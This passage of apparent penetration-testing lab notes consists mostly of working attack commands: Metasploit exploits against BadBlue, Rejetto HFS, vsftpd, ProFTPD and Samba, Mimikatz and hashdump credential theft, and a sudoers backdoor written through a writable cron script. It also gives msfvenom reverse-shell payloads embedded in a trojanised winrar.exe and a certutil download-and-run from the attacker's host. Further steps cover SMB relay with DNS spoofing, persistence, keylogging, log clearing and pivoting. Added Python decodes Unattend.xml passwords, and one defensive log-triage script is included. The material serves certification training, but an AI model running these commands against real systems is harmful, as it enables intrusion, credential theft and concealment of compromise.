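    """Reverse of the above; `base64 -d` alone prints NUL-interleaved text and keeps the suffix."""
    text = base64.b64decode(value).decode("utf-16le")
    return text[: -len(suffix)] if suffix and text.endswith(suffix) else text


def _local(tag: str) -> str:
    return tag.rsplit("}", 1)[-1]          # strip the urn:schemas-microsoft-com:unattend namespace


def extract_unattend_credentials(xml_text: str):
    """Pull every <...Password> element that carries a <Value>, decoding when PlainText is false."""
    root = ET.fromstring(xml_text)
    parent_of = {child: parent for parent in root.iter() for child in parent}
    creds = []
    for el in root.iter():
        name = _local(el.tag)
        if not name.endswith("Password"):
            continue
        children = {_local(c.tag): (c.text or "").strip() for c in el}
        if not children.get("Value"):
            continue
        plaintext = children.get("PlainText", "false").lower() == "true"
        # AutoLogon/Password and LocalAccount/Password use the suffix "Password";
        # UserAccounts/AdministratorPassword uses "AdministratorPassword".
        password = children["Value"] if plaintext else decode_unattend_password(children["Value"], name)
        siblings = {_local(c.tag): (c.text or "").strip() for c in parent_of.get(el, [])}
        user = (siblings.get("Username") or siblings.get("Name")
                or ("Administrator" if name == "AdministratorPassword" else ""))
        creds.append({"context": name, "user": user, "password": password})
    return creds


# Constructed sample Unattend.xml (not from a real host); the AutoLogon value is generated
# with the encoder above so the example stays self-contained.
SAMPLE_UNATTEND = """<?xml version="1.0"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>%s</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
      <UserAccounts>
        <LocalAccounts>
          <LocalAccount>
            <Password><Value>Winter2024!</Value><PlainText>true</PlainText></Password>
            <Name>svc_backup</Name>
            <Group>Administrators</Group>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
    </component>
  </settings>
</unattend>
""" % encode_unattend_password("S3cret!")


if __name__ == "__main__":
    for c in extract_unattend_credentials(SAMPLE_UNATTEND):
        print(c)
```

Run it against the downloaded `unattend.xml` (and `Autounattend.xml`, plus any copies under `C:\Windows\System32\Sysprep\`) instead of eyeballing the base64; the suffix-stripping is what turns the decoded blob into the string psexec.py actually accepts.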
      

Dumping Hashes with Mimikatz

  • Mimikatz: Windows post-exploitation tool → extracts clear-text passwords, hashes & Kerberos tickets from memory (LSASS). It needs a SYSTEM / SeDebugPrivilege context, which is why the steps below migrate into lsass.exe first.
    > nmap -sV <IP>
    > msfconsole
    > search badblue
    > use exploit/windows/http/badblue_passthru
    > set RHOSTS <IP>
    > exploit
    > sysinfo
    > getuid
    > pgrep lsass
    > migrate <ID>
    > getuid
    > load kiwi
    > ? // Help Menu
    > creds_all // Dump all creds
    > lsa_dump_sam
    > lsa_dump_secrets
    > cd C:\\
    > mkdir Temp
    > cd Temp
    > upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
    > shell
    > dir
    > mimikatz.exe 
    > privilege::debug
    > lsadump::sam
    > lsadump::secrets
    > sekurlsa::logonpasswords
    

Linux Exploits

FTP

> nmap -sV <IP>
> ftp <IP> // Check anonymous login
> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ftp
> searchsploit proftpd

SSH

> hydra -L /usr/share/metasploit-framework/data/wordlists/common_users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> -t 4 ssh

SAMBA

  • Samba is the open-source implementation of SMB/CIFS for Linux & other Unix-like systems
  • Samba allows Windows systems to access shares & printers on Linux hosts (& lets Linux clients talk to Windows shares)
    > nmap -sV <IP>
    > hydra -l admin -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb
    > smbmap -H <IP> -u admin -p <password>
    > smbclient -L <IP> -U admin 
    > smbclient //<IP>/shawn -U admin
    > ?
    > dir
    > smbclient //<IP>/nancy -U admin
    > get flag
    > ls 
    > cat flag
    > smbclient //<IP>/admin -U admin
    > tar xzf flag.tar.gz
    > cat flag
    > enum4linux -a <IP>
    > enum4linux -a -u admin -p <password> <IP>
    

Linux Privilege Escalation

Linux Kernel Exploits

  • Linux Exploit Suggester: https://github.com/The-Z-Labs/linux-exploit-suggester
    > sysinfo
    > getuid
    > shell
    > /bin/bash -i
    > cat /etc/passwd
    > // Download linux-exploit-suggester (les.sh) from the repo & upload it to the target
    > chmod +x les.sh
    > ./les.sh // matches the kernel version against known exploits; verify a candidate before running it, kernel exploits can crash the box
    

Misconfigured Cron Jobs

  • Cron → Time based service that runs applications, scripts & other commands repeatedly on a specific schedule
  • In order to elevate our privileges, we need to find cron jobs scheduled by the root user whose script (or a file that script processes) is writable by us
    > whoami
    > groups <user>
    > cat /etc/passwd
    > crontab -l // List crontab for current user (root's jobs live in /etc/crontab, /etc/cron.d/ & /var/spool/cron/crontabs/, which we usually can't read)
    > ls -la
    > cd /
    > grep -rnw /usr -e "/home/student/message" // find the script that references a file in our home directory
    > cat /tmp/message
    > ls -la /usr/local/share/copy.sh // world-writable script run by root's cron job
    > cat /usr/local/share/copy.sh
    > printf '#!/bin/bash\necho "student ALL=NOPASSWD:ALL" >> /etc/sudoers' > /usr/local/share/copy.sh
    > // wait for the next cron run (e.g. a minute), then:
    > sudo su
    

SUID Binaries

  • SUID → Set User ID permission bit
  • This permission lets a user execute a binary with the privileges of the file owner instead of the privileges of the user running it
  • SUID permissions are typically used to provide unprivileged users with the ability to run specific binaries with "root" permissions (passwd, sudo, ping).
  • The elevated privileges apply only while that binary runs; they don't persist for the user afterwards. Escalation therefore means making the SUID binary do something else, e.g. run a program it calls by relative name or looks up via PATH.
    > whoami
    > groups <user>
    > ls -la // look for -rwsr-xr-x (the s in the owner's execute slot); system-wide: find / -perm -4000 -type f 2>/dev/null
    > file welcome
    > strings welcome // the binary calls "greetings" by name rather than by full path
    > rm greetings
    > cp /bin/bash greetings // welcome now executes our copy of bash as root
    > ./welcome
    > cat /etc/shadow
    

Dumping Linux Password Hashes

  • Prefix ($id$ at the start of the hash field in /etc/shadow):
    • $1$ → MD5 (md5crypt)
    • $2a$ / $2b$ / $2y$ → bcrypt (Blowfish-based)
    • $5$ → SHA-256 (sha256crypt)
    • $6$ → SHA-512 (sha512crypt)
    • $y$ → yescrypt (default on recent Debian, Ubuntu & Fedora)
      > nmap -sV <IP>
      > searchsploit proftpd
      > setg RHOSTS <IP>
      > search proftpd
      > use exploit/unix/ftp/proftpd_133c_backdoor
      > show options
      > set payload cmd/unix/reverse
      > exploit
      > /bin/bash -i
      > id
      > // CTRL+Z -> background the shell session
      > sessions
      > sessions -u 1 // upgrade the shell to a Meterpreter session
      > sysinfo
      > getuid
      > cat /etc/shadow // readable only as root
      
      // Get hash
      > use post/linux/gather/hashdump
      > show options
      > set SESSION 2
      > run // unshadowed entries are stored in the database (creds / loot)
      
      // Crack hash
      > use auxiliary/analyze/crack_linux
      > set SHA512 true
      > run // runs John the Ripper against the hashes collected by hashdump
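
The prefix table above is what tells you which cracker mode to use, and the rest of the shadow line tells you whether there is anything to crack at all: an empty field, a lone `*` or `!`, a locked-but-hashed `!$6$...` entry and a `rounds=` parameter all mean different things. The code below is an added example (not part of these notes, not Metasploit's hashdump) that parses shadow lines into algorithm, rounds, salt and status, and merges them with passwd lines the way `unshadow` does so the result can go straight to John. All hashes and users in the sample are fake.

```python
# Hash ids seen in /etc/shadow and the matching hashcat mode (-m).
# yescrypt has no hashcat mode; use John for it.
HASH_IDS = {
    "1":  ("md5crypt", 500),
    "2a": ("bcrypt", 3200), "2b": ("bcrypt", 3200), "2y": ("bcrypt", 3200),
    "5":  ("sha256crypt", 7400),
    "6":  ("sha512crypt", 1800),
    "y":  ("yescrypt", None),
}


def parse_shadow_entry(line: str) -> dict:
    """Split one shadow line into user, account status and hash parameters."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 2:
        raise ValueError("not a shadow entry: %r" % line)
    user, field = fields[0], fields[1]
    entry = {"user": user, "status": "active", "algo": None, "hashcat_mode": None,
             "rounds": None, "salt": None, "hash": None, "raw": None, "crackable": False}
    if field == "":
        entry["status"] = "no-password"          # empty field: login without a password
        return entry
    if field in ("*", "!", "!!", "!*"):
        entry["status"] = "no-login"             # no hash at all, nothing to crack
        return entry
    if field.startswith("!"):
        entry["status"] = "locked"               # locked, but the hash is still there
        field = field.lstrip("!")
    entry["raw"] = field
    if not field.startswith("$"):                # legacy 13-char DES crypt: 2-char salt + 11-char hash
        entry["algo"], entry["hashcat_mode"] = "descrypt", 1500
        entry["salt"], entry["hash"], entry["crackable"] = field[:2], field[2:], True
        return entry
    parts = field.split("$")[1:]                 # e.g. ['6', 'rounds=5000', 'salt', 'hash']
    algo_id = parts[0]
    if algo_id not in HASH_IDS:
        entry["algo"] = "unknown($%s$)" % algo_id
        return entry
    entry["algo"], entry["hashcat_mode"] = HASH_IDS[algo_id]
    if entry["algo"] == "bcrypt":                # $2b$<cost>$<22-char salt><31-char hash>
        entry["rounds"] = 2 ** int(parts[1])
        entry["salt"], entry["hash"] = parts[2][:22], parts[2][22:]
    elif entry["algo"] == "yescrypt":            # $y$<params>$<salt>$<hash>
        entry["rounds"], entry["salt"], entry["hash"] = parts[1], parts[2], parts[3]
    else:                                        # $1 / $5 / $6 with optional rounds=N
        if parts[1].startswith("rounds="):
            entry["rounds"] = int(parts[1][len("rounds="):])
            parts = [parts[0]] + parts[2:]
        entry["salt"], entry["hash"] = parts[1], parts[2]
    entry["crackable"] = True
    return entry


def unshadow(passwd_lines, shadow_lines):
    """Merge like `unshadow passwd shadow`: the passwd line with 'x' replaced by the hash.
    Only accounts that actually have a hash to crack are kept; the '!' lock marker is dropped."""
    hashes = {}
    for line in shadow_lines:
        e = parse_shadow_entry(line)
        if e["crackable"]:
            hashes[e["user"]] = e["raw"]
    merged = []
    for line in passwd_lines:
        f = line.rstrip("\n").split(":")
        if f[0] in hashes:
            f[1] = hashes[f[0]]
            merged.append(":".join(f))
    return merged


# Constructed sample lines (fake hashes, not real credentials).
SAMPLE_SHADOW = [
    "root:$6$rounds=5000$saltsalt$FAKEHASHFAKEHASH:19500:0:99999:7:::",
    "student:$y$j9T$saltsaltsalt$FAKEYESCRYPTHASH:19500:0:99999:7:::",
    "daemon:*:19500:0:99999:7:::",
    "bob:!$1$abcdefgh$FAKEMD5CRYPT:19500:0:99999:7:::",
]
SAMPLE_PASSWD = [
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "student:x:1000:1000::/home/student:/bin/bash",
    "bob:x:1001:1001::/home/bob:/bin/bash",
]

if __name__ == "__main__":
    for line in SAMPLE_SHADOW:
        print(parse_shadow_entry(line))
    print("\n".join(unshadow(SAMPLE_PASSWD, SAMPLE_SHADOW)))
```

A locked account still yields a crackable hash (the lock only stops logins for that user), which matters when the same password is reused elsewhere; the parser keeps it for that reason.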
      

Network-Based Attacks

Firewall Detection & IDS Evasion

> nmap -Pn -sS -F <IP> // -F -> Fast Scan
> nmap -Pn -sS -sV -F -f <IP> // -f -> Fragment Packets

SMB & NetBIOS Enumeration

  • NetBIOS → API & a set of network protocols providing communication services over a local network. It is used primarily to allow applications on different computers to find & interact with each other on a network (name service on UDP/137, datagram service on UDP/138, session service on TCP/139)
  • SMB → A network file sharing protocol that allows computers on a network to share files, printers, & other resources (TCP/445 directly, or TCP/139 over NetBIOS)
    > cat /etc/hosts
    > ping demo.ine.local // reachable IP1
    > ping demo1.ine.local // not reachable IP2 (only reachable through IP1 -> pivot later)
    > nmap demo.ine.local
    > whatis nbtscan
    > nbtscan <IP/Subnet> // NetBIOS name table of every host in the range
    > nmblookup -A <IP1> // node status query against one host
    > nmap -sU -p 137 <IP1>
    > nmap -sU -sV -p 137 -T4 --script=nbstat.nse -Pn -n <IP1>
    > nmap -sV -p 139,445 demo.ine.local
    > ls -la /usr/share/nmap/scripts/ | grep -e "smb-*"
    > nmap -p445 --script smb-protocols demo.ine.local // SMBv1 still enabled? (EternalBlue candidate)
    > nmap -p445 --script smb-security-mode demo.ine.local // message signing required or not (relay candidate if not)
    > smbclient -L demo.ine.local // testing for anonymous access -> press enter at the password prompt
    > nmap -p445 --script smb-enum-users demo.ine.local
    > nano users.txt // enter all usernames found
    > hydra -L users.txt -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt demo.ine.local smb
    > psexec.py administrator@demo.ine.local
    > whoami
    
    // MSF
    > search psexec
    > use exploit/windows/smb/psexec
    > set SMBUser <username>
    > set SMBPass <password>
    > set payload windows/x64/meterpreter/reverse_tcp
    > exploit
    > sysinfo
    > shell
    > ping <IP2> // reachable from the compromised host -> exit the shell
    > run autoroute -s <IP2/Subnet> // e.g. /20 -> Meterpreter command; routes MSF traffic for that subnet through this session
    > background
    > search socks
    > use auxiliary/server/socks_proxy
    > set VERSION 4a // must match the proxy line in /etc/proxychains4.conf
    > set SRVPORT <ProxychainPort>
    > run
    > netstat -antp // confirm the SOCKS listener is up
    
    // Machine 1 (through the proxy only full-connect scans work, hence -sT & -Pn)
    > proxychains nmap demo1.ine.local -sT -Pn -sV -p 445
    
    // MSF
    > shell
    > net view <IP2>
    > background
    > migrate -N explorer.exe
    > shell
    > net view <IP2>
    > net use D: \\<IP2>\Documents
    > net use K: \\<IP2>\K$
    > dir D:
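
nbtscan, nmblookup -A and nmap's nbstat.nse all send the same thing: a NetBIOS node status request for the wildcard name "*" to UDP/137, and decode the name table that comes back. The code below is an added example (not part of these notes and not the code of any of those tools) that implements the RFC 1001 name encoding, builds that request and parses a response into names, suffixes and the MAC address; the response packet is constructed for the example, no host is contacted.

```python
import struct

# Well-known NetBIOS name suffixes (the 16th byte of the name).
SUFFIXES = {
    0x00: "Workstation / Domain name", 0x03: "Messenger service",
    0x1B: "Domain master browser", 0x1C: "Domain controllers",
    0x1D: "Master browser", 0x1E: "Browser service elections",
    0x20: "File server service",
}


def nb_encode(name: str, suffix: int = 0x00, pad: bytes = b" ") -> str:
    """RFC 1001 first-level encoding: pad the name to 15 bytes, append the suffix byte,
    then write each byte as two nibbles offset by 'A'."""
    raw = name.upper().encode("ascii")[:15].ljust(15, pad) + bytes([suffix])
    return "".join(chr(0x41 + (b >> 4)) + chr(0x41 + (b & 0x0F)) for b in raw)


def nb_decode(encoded: str):
    """Inverse of nb_encode -> (name, suffix)."""
    if len(encoded) != 32 or any(c not in "ABCDEFGHIJKLMNOP" for c in encoded):
        raise ValueError("not a first-level encoded NetBIOS name")
    raw = bytes(((ord(encoded[i]) - 0x41) << 4) | (ord(encoded[i + 1]) - 0x41)
                for i in range(0, 32, 2))
    return raw[:15].decode("ascii").rstrip(" \x00"), raw[15]


def build_nbstat_query(txid: int = 0x1337) -> bytes:
    """NBSTAT (node status) request as sent to UDP/137 by nbtscan / nmblookup -A."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)          # flags=0 (query), 1 question
    qname = b"\x20" + nb_encode("*", 0x00, b"\x00").encode("ascii") + b"\x00"  # wildcard name "*"
    return header + qname + struct.pack(">HH", 0x0021, 0x0001)          # QTYPE=NBSTAT, QCLASS=IN


def parse_nbstat_response(pkt: bytes) -> dict:
    """Parse the node status response: the host's name table plus its MAC address."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or an != 1:
        raise ValueError("not a node status response")
    off = 12
    off += 1 + pkt[off] + 1                      # skip RR_NAME: length byte + label + terminator
    rtype, _rclass, _ttl, _rdlen = struct.unpack(">HHIH", pkt[off:off + 10])
    off += 10
    if rtype != 0x0021:
        raise ValueError("unexpected RR type 0x%04x" % rtype)
    count = pkt[off]
    off += 1
    names = []
    for _ in range(count):                       # 18 bytes each: 15 name + suffix + 2 flag bytes
        node, suffix = pkt[off:off + 15], pkt[off + 15]
        nflags = struct.unpack(">H", pkt[off + 16:off + 18])[0]
        names.append({"name": node.decode("ascii", "replace").rstrip(" \x00"),
                      "suffix": suffix,
                      "type": SUFFIXES.get(suffix, "unknown"),
                      "group": bool(nflags & 0x8000)})   # G bit: group name vs unique name
        off += 18
    mac = ":".join("%02X" % b for b in pkt[off:off + 6])  # first 6 bytes of STATISTICS
    return {"txid": txid, "names": names, "mac": mac}


def build_sample_response(txid: int = 0x1337) -> bytes:
    """Constructed node status response (not a real capture): host WIN-DEMO in WORKGROUP."""
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)
    rr_name = b"\x20" + nb_encode("*", 0x00, b"\x00").encode("ascii") + b"\x00"
    entries = [("WIN-DEMO", 0x00, 0x0400), ("WIN-DEMO", 0x20, 0x0400),
               ("WORKGROUP", 0x00, 0x8400), ("WORKGROUP", 0x1E, 0x8400)]
    body = bytes([len(entries)])
    for name, suffix, nflags in entries:
        body += name.encode("ascii").ljust(15) + bytes([suffix]) + struct.pack(">H", nflags)
    body += bytes.fromhex("0a0027b1a9c3") + b"\x00" * 40    # MAC + zeroed statistics
    return header + rr_name + struct.pack(">HHIH", 0x0021, 0x0001, 0, len(body)) + body


if __name__ == "__main__":
    print(nb_encode("FRED"), build_nbstat_query().hex())
    for n in parse_nbstat_response(build_sample_response())["names"]:
        print(n)
```

Sending `build_nbstat_query()` over a UDP socket to port 137 and feeding the reply to `parse_nbstat_response` reproduces the nbtscan one-liner; the <20> suffix is the one worth noting, since it means the host runs a file server and is a target for the SMB steps above.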
    

SNMP Enumeration

> cat /etc/hosts
> nmap -sU -sV -p 161 demo.ine.local
> ls -la /usr/share/nmap/scripts | grep -e "snmp-*"
> ls -la /usr/share/nmap/nselib/data/ | grep snmp // community-string wordlist used by snmp-brute
> nmap -sU -p 161 --script=snmp-brute demo.ine.local
> snmpwalk -v 1 -c public demo.ine.local // walk the whole MIB with the discovered community string
> nmap -sU -p 161 --script=snmp-* demo.ine.local > snmp_results // Enumerate users, processes, shares, etc.
> hydra -l administrator -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt <IP> smb // usernames from snmp-win32-users feed the SMB brute-force

SMB Relay Attack

  • It is a type of network attack where an attacker intercepts SMB authentication traffic & relays it to a legitimate server to gain unauthorized access to resources or perform malicious actions. It only works against targets that don't require SMB signing (check with smb-security-mode)
    > search smb_relay
    > use exploit/windows/smb/smb_relay
    > set SRVHOST <IP> // Kali Linux IP - ifconfig
    > set LHOST <IP> // Kali Linux IP - ifconfig
    > set SMBHOST <IP> // the server the authentication is relayed to - check lab docs
    > exploit
    
    // New Tab: poison DNS so the victim resolves the share's hostname to Kali & authenticates to us
    > echo "<Kali-IP> *.sportsfoo" > dns
    > dnsspoof -i eth1 -f dns
    

Metasploit

MSFVenom

- x86 → 32 bit, x64 → 64 bit (match the target process; a 32-bit payload runs on 64-bit Windows, not the other way round)

> msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx86.exe
> msfvenom -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f exe > payloadx64.exe
> msfvenom --list formats
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<A-IP> LPORT=<A-Port> -f elf > payloadx86.elf

// ENCODERS
// -e -> Encoder (x86/shikata_ga_nai: polymorphic XOR; defeats only naive static signatures, not current AV)
// -i -> Iterations: encode the output again N times
// -x -> Template: inject the payload into an existing executable
// -k -> Keep the template's original behaviour (ex. winrar.exe still runs; the payload starts in a new thread)
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > encodedx86.exe
> msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f elf > encodedx86.elf
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -x ~/Downloads/winrar601.exe > winrar.exe
> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe -k -x ~/Downloads/winrar601.exe > winrar.exe

// MSF Scripts
> msfconsole -r handler.rc
> 

HTTP File Server (HFS)

> db_nmap -sS -sV -O <IP>
> search type:exploit name:rejetto
> use exploit/windows/http/rejetto_hfs_exec
> set RHOSTS <IP>
> exploit // 32-bit session
> set payload windows/x64/meterpreter/reverse_tcp
> exploit // 64-bit session

Apache Tomcat Java Server

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> search type:exploit tomcat_jsp
> use exploit/multi/http/tomcat_jsp_upload_bypass
> set payload java/jsp_shell_bind_tcp // bind payload: the target listens, so only LPORT is needed (no LHOST)
> set LPORT <port>
> set SHELL cmd
> exploit
> background the session

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali-IP> LPORT=1234 -f exe> meterpreter.exe 
> sudo python3 -m http.server 80

> sessions 1
> certutil -urlcache -f http://<Kali-IP>/meterpreter.exe meterpreter.exe
> dir // Continue

> nano handler.rc
> use multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST <Kali-IP>
> set LPORT 1234
> run
> // save the file, then launch msfconsole with it:
> msfconsole -r handler.rc

> .\meterpreter.exe // Resume after running handler.rc

> sysinfo
> getuid

FTP Server

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> services
> analyze
> search vsftpd
> use exploit/unix/ftp/vsftpd_234_backdoor
> exploit
> background
> sessions
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1 // interface name or the Kali IP
> set SESSION <ID>
> run
> sessions 2
> sysinfo

SAMBA : File Sharing Service

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search type:exploit name:samba
> use exploit/linux/samba/is_known_pipename
> check // check whether the target is vulnerable without exploiting it
> run
> ls / pwd
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2
> sysinfo

SSH

> setg RHOSTS <IP>
> db_nmap -sS -sV -O <IP>
> search libssh_auth_bypass
> use auxiliary/scanner/ssh/libssh_auth_bypass
> set SPAWN_PTY true
> run
> sessions 1
> background
> search shell_to_meterpreter
> use post/multi/manage/shell_to_meterpreter
> set LHOST eth1
> set SESSION <ID>
> run
> sessions 2

SMTP

> setg RHOSTS <IP>
> db_nmap -sV -O <IP>
> search type:exploit name:haraka
> use exploit/linux/smtp/haraka
> set SRVPORT 9898
> set email_to root@attackdefense.test
> set payload linux/x64/meterpreter_reverse_http
> set LHOST eth1 

Meterpreter

> edit flag1 // Text Editor
> download flag1 
> checksum md5 /bin/bash
> getenv PATH
> search -d /usr/bin -f *backdoor*
> search -f *.jpg
> search -f *.php
> shell
> ps // Runnning Processes
> migrate <pid>
> sessions -u 1 // Upgrade shell session 1 to a Meterpreter session

Windows Post Exploitation

Modules

> setg RHOSTS <IP>
> db_nmap -sV <IP>
> search rejetto
> use exploit/windows/http/rejetto_hfs_exec
> run
> getsystem // elevate privileges
> getuid
> hashdump
> show_mount
> ps // list process
> migrate <pid>

> search win_privs
> use post/windows/gather/win_privs
> set SESSION <id>
> run
> search enum_logged
> use post/windows/gather/enum_logged_on_users
> set SESSION <id>
> run
> search checkvm
> use post/windows/gather/checkvm
> set SESSION <id>
> run
> search enum_applications
> use post/windows/gather/enum_applications
> set SESSION <id>
> run
> loot // Store results in DB
> use post/windows/gather/windows_av_excluded
> set SESSION 1
> run
> search enum_computer
> use post/windows/gather/enum_computers
> search enum_patches
> use post/windows/gather/enum_patches
> use post/windows/gather/enum_shares
> use post/windows/manage/enable_rdp
> set SESSION <id>
> run

UAC Bypass

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getuid
> getsystem
> getprivs
> shell
> net users
> net localgroup administrators
> background
> search bypassuac
> use exploit/windows/local/bypassuac_injection
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> set LPORT 1234
> run
> set TARGET Windows\ x64
> run
> getsystem
> hashdump

Token Impersonation With Incognito

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> sysinfo
> getprivs
> load incognito
> list_tokens -u
> impersonate_token "ATTACKDEFENSE\Administrator"
> getuid
> migrate <>
> getuid

Windows Persistence

> use exploit/windows/http/rejetto_hfs_exec
> set payload windows/x64/meterpreter/reverse_tcp
> set LHOST eth1
> exploit
> background
> search platform:windows name:persistence
> use exploit/windows/local/persistence_service
> set payload windows/x64/meterpreter/reverse_tcp
> set SESSION 1
> exploit
> set payload windows/meterpreter/reverse_tcp
> exploit
> sysinfo
> sessions -K


> use multi/handler
> set LHOST eth1
> run

Enabling RDP

> use exploit/windows/http/badblue_passthru
> set RHOSTS
> set target Badblue\ EE\ 2.7\ Universal
> exploit
> background
> search enable_rdp
> use post/windows/manage/enable_rdp
> set SESSION 1
> exploit
> db_nmap -sV -p 3389 <IP>
> shell 
> net user administrator hacker_123321 // Change Password
> xfreerdp /u:administrator /p:hacker_123321 /v:<IP>

Windows Keylogging

> use exploit/windows/http/badblue_passthru
> exploit
> pgrep explorer
> migrate <ID>
> keyscan_start
> keyscan_dump

Clearing Windows Event Logs

> use exploit/windows/http/badblue_passthru
> exploit
> clearev // Deletes Event Logs
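The defender's side of the Windows persistence, "Enabling RDP" and log-clearing sections above: an added example, not from the original notes, of triaging the Windows event IDs those actions leave behind (7045 for a new service, 4724 for a password reset, 4720/4732 for a new local administrator, 1102/104 for cleared logs). The event records are constructed and the severity rules are my own choices.

```python
from collections import Counter

# Constructed sample of Windows event records (invented values, not real logs),
# reduced to the fields a SIEM export normally keeps. The sequence mirrors the
# actions in the sections above: a service installed for persistence (7045), the
# administrator password reset with "net user" (4724), a new local admin (4720,
# 4732) and finally the logs being cleared with clearev (1102, 104).
EVENTS = [
    {"Channel": "Security", "EventID": 4624, "SubjectUserName": "alice"},
    {"Channel": "System", "EventID": 7045, "SubjectUserName": "SYSTEM",
     "ServiceName": "WindowsUpdateHelper", "ImagePath": r"C:\Windows\Temp\qXjd.exe"},
    {"Channel": "Security", "EventID": 4724, "SubjectUserName": "SYSTEM",
     "TargetUserName": "administrator"},
    {"Channel": "Security", "EventID": 4720, "SubjectUserName": "administrator",
     "TargetUserName": "svc_backup"},
    {"Channel": "Security", "EventID": 4732, "SubjectUserName": "administrator",
     "TargetUserName": "Administrators", "MemberName": "svc_backup"},
    {"Channel": "Security", "EventID": 1102, "SubjectUserName": "administrator"},
    {"Channel": "System", "EventID": 104, "SubjectUserName": "administrator"},
]

# (Channel, EventID) -> (default severity, description); severities are my choice
RULES = {
    ("Security", 1102): ("high", "security audit log cleared"),
    ("System", 104): ("high", "system event log cleared"),
    ("System", 7045): ("medium", "new service installed"),
    ("Security", 4720): ("medium", "local user account created"),
    ("Security", 4732): ("medium", "member added to local group"),
    ("Security", 4724): ("medium", "account password reset by another principal"),
}
LOG_CLEARED = {1102, 104}


def describe(event):
    """Build the one-line detail for an alert from the event's fields."""
    eid = event["EventID"]
    if eid == 7045:
        return f"{event.get('ServiceName')} -> {event.get('ImagePath')}"
    if eid == 4732:
        return f"{event.get('MemberName')} -> {event.get('TargetUserName')}"
    return event.get("TargetUserName", "")


def triage(events):
    """Return one alert dict per event that matches RULES, in log order."""
    alerts = []
    for e in events:
        rule = RULES.get((e["Channel"], e["EventID"]))
        if rule is None:
            continue
        severity, title = rule
        # Escalate the two cases that most often mean a foothold is being kept:
        # a new member of Administrators, or a service binary living under Temp.
        if e["EventID"] == 4732 and e.get("TargetUserName", "").lower() == "administrators":
            severity = "high"
        if e["EventID"] == 7045 and "\\temp\\" in e.get("ImagePath", "").lower():
            severity = "high"
        alerts.append({"event_id": e["EventID"], "severity": severity, "title": title,
                       "actor": e.get("SubjectUserName"), "detail": describe(e)})
    return alerts


def cleared_after_changes(alerts):
    """True when a log-cleared event follows an earlier change alert, the
    classic sign that someone tidied up after themselves."""
    seen_change = False
    for a in alerts:
        if a["event_id"] in LOG_CLEARED:
            if seen_change:
                return True
        else:
            seen_change = True
    return False


def severity_counts(alerts):
    """Count alerts per severity level."""
    return Counter(a["severity"] for a in alerts)


if __name__ == "__main__":
    found = triage(EVENTS)
    for a in found:
        print(f"[{a['severity']:6}] {a['event_id']:>4} {a['title']}: {a['detail']} (by {a['actor']})")
    print("log cleared after changes:", cleared_after_changes(found))
```

The 4624 logon in the sample is deliberately not matched: the point of the rule table is that the interesting signal is the change events, and that a 1102 or 104 arriving after them should be read together with whatever preceded it, not on its own.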

Windows Pivoting

> use exploit/windows/http/rejetto_hfs_exec
> exploit
> sysinfo
> ipconfig // Copy the IP which is from same subnet : Victim 2
> run autoroute -s <IP>/<range> (Range-20)
> background
> use auxiliary/scanner/portscan/tcp
> set RHOSTS <Victim2>
> set PORTS 1-100
> exploit
> sessions 1
> portfwd add -l 1234 -p 80 -r <Victim-2-Ip>
> background
> db_nmap -sS -sV -p 1234 localhost
> use exploit/windows/http/badblue_passthru
> set payload windows/meterpreter/bind_tcp
> set RHOSTS <V-2-Ip>
> set LPORT 4433
> exploit
> sysinfo

Linux Post Exploitation

Post-Exploitation Modules

> search samba
> use exploit/linux/samba/is_known_pipename
> set RHOSTS <IP>
> exploit
> pwd
> background
> sessions -u 1 
> sessions 2
> sysinfo
> getuid
> shell
> /bin/bash -i
> whoami
> uname -r 
> uname -a 
> ifconfig
> ip a s 
> netstat -antp
> ps aux
> env
> terminate
> sessions -u 1 
> search enum_configs
